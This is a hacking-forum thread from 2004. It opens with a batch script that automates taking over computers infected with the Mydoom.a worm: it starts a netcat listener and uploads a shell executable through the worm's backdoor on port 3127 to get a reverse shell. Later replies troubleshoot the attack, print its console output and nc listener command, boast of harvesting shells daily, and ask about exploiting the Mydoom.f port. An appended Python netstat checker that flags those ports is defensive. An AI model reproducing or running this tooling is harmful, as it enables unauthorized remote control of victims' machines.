Full Version: Mydoom.a Exploit :)
usch
CODE

echo off
cls
echo ----------------------------------------------------------
echo ¦                    Mydoom.a Autohax0r                  ¦
echo ¦                      code by tjarx                     ¦
echo ¦                 for governmentsecurity.org             ¦
echo ¦                   special thx to Demoman               ¦
echo ¦________________________________________________________¦
echo ----------------------------------------------------------
echo.
echo.
set /p ownip=                Your IP:
set /p vicip=                Enter the Machine's IP:
set /p exec=                 Enter your shell executable:
start nc.exe -v -l -s %ownip% -p 4445
mykralor.exe %vicip% 3127 %exec%



Notes: the bat has to be put into the same directory as nc.exe and mykralor.
Your created shell executable has to spawn a shell on port 4445, because that's the port nc is listening on.

Have fun with that tool.
Hope it works.
Leonnetje
Thanks for the autohaxor, Usch..

Don't think I'll use it anymore, because it seems like every machine that WAS infected has already been patched... All vulns are gone.
dragonfly
Yes indeed, all the mydoom.a has been replaced with mydoom.c, so bye bye Mydoom.
Sedolf
Need to post it here because I can't make new threads..
As you know, the mydoom.f variant of the worm is out now and spreading very fast!
It opens TCP port 1080 for hacker attacks, seems to use the same system as mydoom.a/b.
So my questions now are: Anyone had luck scanning port 1080 and trying to exploit with mykralor?
Do you think that it could work, or does every mydoom variant use another method of being exploited?
Does mydoomjuice (and however they are all called) kill this worm?
If you get hands on the source code - it should be possible to modify the kralor sploit?
That's it.
tazthedev
Damn...... I hate that damn exploit .....


Cannot get any reverse shell

-----------------------------------
I try this....... mykralor.exe xxx.xxx.91.90 3127 shell.exe

[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.

C:\hacks\exploit\mydoom\MyDoomGui211>

---------------------------------------------------------

C:\hacks\exploit\mydoom\MyDoomGui211>nc -v -l -s xxx.xxx.198.27 -p 3128
listening on [xxx.xxx.198.27] 3128 ...
-----------------------------------------------------------

There's nothing ..... got no damn shell


PLZ...... HELP !!!!! I GOT NOTHING, WHY ?
Nexcess
QUOTE (tazthedev @ Feb 25 2004, 12:08 AM)
Damn...... I hate that damn exploit .....


Cannot get any reverse shell

-----------------------------------
I try this....... mykralor.exe xxx.xxx.91.90 3127 shell.exe

[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.

C:\hacks\exploit\mydoom\MyDoomGui211>

---------------------------------------------------------

C:\hacks\exploit\mydoom\MyDoomGui211>nc -v -l -s xxx.xxx.198.27 -p 3128
listening on [xxx.xxx.198.27] 3128 ...
-----------------------------------------------------------

There's nothing ..... got no damn shell


PLZ...... HELP !!!!! I GOT NOTHING, WHY ?

Because the worm terminated on the 12th, it's a waste of time now.
bdark
Now it's very hard to get a shell even if you scan dozens of ranges daily :/ check other exploits
Black Flag
QUOTE (Sedolf @ Feb 24 2004, 11:40 PM)
Need to post it here because I can't make new threads..
As you know, the mydoom.f variant of the worm is out now and spreading very fast!
It opens TCP port 1080 for hacker attacks, seems to use the same system as mydoom.a/b.
So my questions now are: Anyone had luck scanning port 1080 and trying to exploit with mykralor?
Do you think that it could work, or does every mydoom variant use another method of being exploited?
Does mydoomjuice (and however they are all called) kill this worm?
If you get hands on the source code - it should be possible to modify the kralor sploit?
That's it.

Problem is that port 1080 is also used by SOCKS proxy servers...
mortello
False

It's still possible to get shells (got a friend who still gets 10-12 shells a day using this exploit).

However, it's not as easy as it once was.
Black Flag
Hmmm, really?

I thought the new mydoom variant killed the exploit?
Damn lol, guess I was misinformed. D:

*edits other post*
Samkbc
I haven't been able to get one shell out of this exploit, I would say it's pretty much dead. My question is what would you guys suggest as the best exploit there is to scan for now, gotta keep my systems safe!
macman
I was under the impression that the DDoS attack stopped on the 12th, but the backdoor stays until removed.
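A host-side check for the point made in the last reply, that the backdoor keeps listening until it is removed. This is an added example, not part of the thread: it parses `netstat -ano` output from your own machine and flags listeners on the two ports the thread names (3127 and 1080), marking 1080 for review because, as noted above, SOCKS proxies use it too. The sample output, the severity labels and the function name are assumptions made for the illustration.

```python
import re

# Ports named in the thread. 1080 is also the usual SOCKS proxy port, so a
# listener there needs review rather than being treated as a confirmed hit.
SUSPECT_PORTS = {
    3127: ("high", "Mydoom.a backdoor port used in the thread"),
    1080: ("review", "Mydoom.f port per the thread; also used by SOCKS proxies"),
}

# One TCP row of Windows `netstat -ano`: proto, local, foreign, state, PID.
ROW = re.compile(
    r"^\s*TCP\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+(?P<state>[A-Z_]+)\s+(?P<pid>\d+)\s*$"
)

# Constructed sample output, not taken from a real host.
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:3127           0.0.0.0:0              LISTENING       2212
  TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING       3040
  TCP    192.168.1.10:49152     203.0.113.5:3127       ESTABLISHED     1234
  TCP    [::]:1080              [::]:0                 LISTENING       3100
"""

def find_suspect_listeners(netstat_text):
    """Return one finding per LISTENING socket on a suspect local port."""
    findings = []
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        # Only the local port of a listening socket matters; an outbound
        # connection to a remote port 3127 is a different situation.
        if not m or m.group("state") != "LISTENING":
            continue
        port = int(m.group("port"))
        if port in SUSPECT_PORTS:
            severity, reason = SUSPECT_PORTS[port]
            findings.append({
                "port": port, "pid": int(m.group("pid")),
                "severity": severity, "reason": reason,
                # Loopback-only listeners are not reachable from the network.
                "exposed": m.group("addr") not in ("127.0.0.1", "[::1]"),
            })
    return findings

if __name__ == "__main__":
    for f in find_suspect_listeners(SAMPLE):
        print(f)
```

The PID in each finding can be matched against the process list to see which program owns the listener before deciding whether it is a legitimate proxy or something to remove.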